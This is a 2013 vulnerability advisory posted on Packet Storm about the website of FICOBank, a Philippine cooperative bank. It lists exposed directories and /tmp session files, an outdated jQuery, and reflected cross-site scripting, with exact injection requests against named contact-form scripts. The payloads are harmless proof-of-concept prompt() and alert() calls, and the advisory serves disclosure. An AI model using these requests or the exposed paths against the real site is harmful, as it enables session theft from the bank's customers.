exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

FICOBank Information Disclosure / Cross Site Scripting

FICOBank Information Disclosure / Cross Site Scripting
Posted Aug 23, 2013
Authored by Juan Carlos Garcia

FICOBank suffers from exposed directory listing and cross site scripting vulnerabilities. They do not believe any of this is an issue and if you use them, you should change banks immediately.

tags | exploit, vulnerability, xss
SHA-256 | a3b64ae17ac6373785bfcea917ed3efed819ce567e81d61f13690c93de1a211e

FICOBank Information Disclosure / Cross Site Scripting

Change Mirror Download
FICOBank Directory Listing Information Disclosure / Cross Site Scripting / Jquery Old Version Vulnerable


Report-Timeline:
================

23-08-2013 Advisory

Response:"Our country does not have the same laws as their own and we do not consider to be security flaws the data you send us.
Thank you very much"

( /ME I don´t understand this response.. Is it a joke? )

20-08-2013 Full Disclosure


I-VULNERABILITY
-------------------------

#Title: FICOBank Directory Listing Information Disclosure / Cross Site Scripting / Jquery Old Version Vulnerable

#Vendor:http://www.ficobank.com / http://ficobank.com

#Author:Juan Carlos García (@secnight)

#Follow me

http://www.highsec.es
Twitter:@secnight



II-Introduction:
=============

The First Isabela Cooperative Bank (FICOBank) is one of the pioneer and prominent cooperative banks in the Philippines.
Its origin is deeply rooted in the community, as it was organized 36 years ago by two cooperatives and 47 samahang nayons,
which represented the farmers who have limited resources and access to banking services. From a molehill-size cooperative rural
bank that it opted to be, it elevated to a mountain-high cooperative bank,
as it can now lay claim to a resource base of over Php 2.37 billion (as of December 31, 2012).

-------------------------

III-PROOF OF CONCEPT
====================

Attack details
--------------

Directory Listing
*****************

The web server is configured to display the list of files contained in this directory.
This is not recommended because the directory may contain files that are not normally
exposed through links on the web site.A user can view a list of all files from this
directory possibly exposing sensitive information.

Affected items

http://ficobank.com/annualreport/

/annualreport
/annualreport/_notes
/annualreport/annualreport
/Assets4Sale
/Assets4Sale/a4sale
/Assets4Sale/a4sale/_notes
/contact
/contact/_notes
/contact/html-contact-form-captcha
/contact/html-contact-form-captcha/_notes
/contact/html-contact-form-captcha/scripts
/contact/html-contact-form-captcha/scripts/_notes
/contact/scripts
/contact/scripts/_notes
/contact/scripts-old
/contact/scripts-old/_notes
/DepositProducts
/DepositProducts/_notes
/Ficonnect
/flash
/flash/_notes
/images
/images/awards
/images/images
/images/jobopening
/images/jobopening/_notes
/images/officer
/images/signature
/images/signature/_notes
/images/slides
/Leadership
/LoanProducts
/news
/news/_notes
/OtherServices
/OtherServices/_notes
/scripts
/scripts/_notes
/Stylesheet
/Stylesheet/_notes

Temporary file/directory

Affected items

http://www.ficobank.com/tmp/

/tmp
/tmp/mailError.log
/tmp/sess_secnightsessionfixation
/tmp/sess_b35e89c88df72a4c589a5a8e1a495594
/tmp/sess_f277f2a2689ac1ee7b04b527b80b9b7c
/tmp/untitled

File Lock

These lock files often contain usernames of the user that
has locked the file. Username harvesting can be done using this technique...


http://www.ficobank.com/DepositProducts/

Cross Site Scripting
****************

Cross site scripting (also referred to as XSS) is a vulnerability that allows
an attacker to send malicious code (usually in the form of Javascript) to another user.
Because a browser cannot know if the script should be trusted or not, it will execute
the script in the user context allowing the attacker to access any cookies or session tokens
retained by the browser.


Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into
a vulnerable application to fool a user in order to gather data from them.An attacker can steal the
session cookie and take over the account,impersonating the user.It is also possible to modify the content
of the page presented to the user.


Affected items

/contact/contactus.php

URL encoded POST input email was set to sample%40email.tst' onmouseover=prompt(947854) bad='
The input is reflected inside a tag parameter between single quotes.


Variant email(2)

6_letters_code=94102&email=sample%2540email.tst%27%20onmouseover%3dprompt%28947854%29%20bad%3d%27&message=20&name=secnight&submit=Submit

6_letters_code=94102&email=sample%2540email.tst%27%20onmouseover%3dprompt%28924627%29%20bad%3d%27&message=20&name=jjxlxmqv&submit=Submit



Variant Name

URL encoded POST input name was set to secnight'and jjxlxmqv' onmouseover=prompt(991722) bad='
The input is reflected inside a tag parameter between single quotes.

POST /contact/contactus.php

6_letters_code=94102&email=sample%40email.tst&message=20&name=secnight%27%20onmouseover%3dprompt%28991722%29%20bad%3d%27&submit=Submit
6_letters_code=94102&email=sample%40email.tst&message=20&name=jjxlxmqv%27%20onmouseover%3dprompt%28991722%29%20bad%3d%27&submit=Submit


/contact/email.php

URI was set to #" onmouseover=prompt(919235) //
The input is reflected inside a tag parameter between double quotes.

GET /contact/email.php/%F6%22%20onmouseover=prompt(919235)%20//


/contact/email.php.bak

URI was set to #" onmouseover=prompt(994575) //

GET /contact/email.php.bak/%F6%22%20onmouseover=prompt(994575)%20//


/contact/email.php.BAK

URI was set to #" onmouseover=prompt(924567) //

The input is reflected inside a tag parameter between double quotes.


GET /contact/email.php.BAK/%F6%22%20onmouseover=prompt(924567)%20//


/contact/html-contact-form-captcha/html-contact-form.php (4)

URL encoded POST input email was set to sample%40email.tst' onmouseover=prompt(913822) bad='

POST /contact/html-contact-form-captcha/html-contact-form.php

6_letters_code=94102&email=sample%2540email.tst%27%20onmouseover%3dprompt%28913822%29%20bad%3d%27&message=20&name=fpfvlamn&submit=Submit


/contact/samplexyz.php (7)

URL encoded POST input contactname was set to pdnfeddf" onmouseover=prompt(969944) bad="

POST /contact/samplexyz.php

contactname=pdnfeddf%22%20onmouseover%3dprompt%28969944%29%20bad%3d%22&email=sample%40email.tst&subject=1

Variants contactname,email,subject


/contact/samplexyz.php.bak

URI was set to #" onmouseover=prompt(959358) //
The input is reflected inside a tag parameter between double quotes.

GET /contact/samplexyz.php.bak/%F6%22%20onmouseover=prompt(959358)%20//


/contact/samplexyz.php.BAK

URI was set to #" onmouseover=prompt(966989) //

GET /contact/samplexyz.php.BAK/%F6%22%20onmouseover=prompt(966989)%20//


/contactus.php(4)

Variant email, name

email(3)

URL encoded POST input email was set to sample%40email.tst' onmouseover=prompt(971885) bad='


6_letters_code=94102&email=sample%2540email.tst%27%20onmouseover%3dprompt%28971885%29%20bad%3d%27&message=20&name=bxaskxpx&submit=Submit

name(1)

URL encoded POST input name was set to iwelgyng' onmouseover=prompt(991324) bad='

6_letters_code=94102&email=sample%40email.tst&message=20&name=iwelgyng%27%20onmouseover%3dprompt%28991324%29%20bad%3d%27&submit=Submit


Jquery Old Version Vulnerable
***************************

jQuery JavaScript Library v1.4.2

This problem was fixed in jQuery 1.6.3.

This page is using an older version of jQuery that is vulnerable to a Cross Site Scripting vulnerability.
Many sites are using to select elements using location.hash that allows someone to inject
script into the page.

$("#id") is css selector, $("<img>") is createElement, and $("#<img>") is createElement too.


Affected items

/OtherServices/fade.min.js


GET /OtherServices/fade.min.js

Response:

HTTP/1.1 200 OK
Date: Fri, 23 Aug 2013 15:48:45 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml",
CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 13 Dec 2011 07:09:36 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Age: 0
Connection: keep-alive
Server: YTS/1.20.28


/OtherServices/jquery.fade.js


GET /OtherServices/jquery.fade.js
jquery_xss/#<img src=/ onerror=alert(1)>

Response

HTTP/1.1 200 OK
Date: Fri, 23 Aug 2013 15:48:46 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 13 Dec 2011 07:09:52 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Age: 0
Connection: keep-alive
Server: YTS/1.20.28
Content-Length: 72174


/scripts/fade.min.js


GET /scripts/fade.min.js

Response

HTTP/1.1 200 OK
Date: Fri, 23 Aug 2013 15:48:46 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Thu, 11 Jul 2013 03:44:10 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Age: 0
Connection: keep-alive
Server: YTS/1.20.28
Content-Length: 72174


/scripts/jquery.fade.js


GET scripts/jquery.fade.js

Response

The same..


IV. CREDITS
-------------------------

This vulnerability has been discovered
by Juan Carlos García(@secnight)

Special Thanks: Perseo


V. LEGAL NOTICES
-------------------------

The Author accepts no responsibility for any damage
caused by the use or misuse of this information.
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close